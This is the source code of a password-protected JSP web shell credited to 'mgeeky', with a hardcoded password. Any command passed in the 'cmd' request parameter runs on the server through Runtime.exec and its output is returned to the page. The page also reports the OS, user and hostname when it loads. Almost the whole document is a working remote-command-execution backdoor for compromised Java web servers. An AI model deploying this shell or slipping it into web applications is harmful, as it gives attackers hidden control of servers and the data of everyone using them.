<%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <%! public String execute(String pass, String cmd, Boolean skip) { // ---------------------------------------- // CHANGE THIS HARDCODED PASSWORD // final String hardcodedPass = "brhQ5U7OzHdqpnTgKaCo6Zd"; StringBuilder res = new StringBuilder(); if (cmd != null && cmd.length() > 0 && ((skip) || (pass.equals(hardcodedPass) || hardcodedPass.toLowerCase().equals("none")))){ try { Process proc = Runtime.getRuntime().exec(cmd); OutputStream outs = proc.getOutputStream(); InputStream ins = proc.getInputStream(); DataInputStream datains = new DataInputStream(ins); String datainsline = datains.readLine(); while ( datainsline != null) { res.append(datainsline + "
"); datainsline = datains.readLine(); } } catch( IOException e) { return "IOException: " + e.getMessage(); } } else { return "Wrong password or no command issued."; } String out = res.toString(); if (out != null && out.length() > 5 && out.indexOf("
") != -1) { out = out.substring(0, out.length() - 5); } out = out.replaceAll("(\r\n|\n\r|\n|\r)", "
"); return out; } %> JSP Application

Authenticated JSP Webshell.

You need to provide a valid password in order to leverage this application.
coded by mgeeky

OS: <% out.print(System.getProperty("os.name")); %>
<% out.print(execute("", "whoami", true) + "@" + execute("", "hostname", true));%>

			if (request.getParameter("cmd") != null && request.getParameter("password") != null) {
server$ " + request.getParameter("cmd") + "
"); out.println(execute(request.getParameter("password"), request.getParameter("cmd"), false)); } %>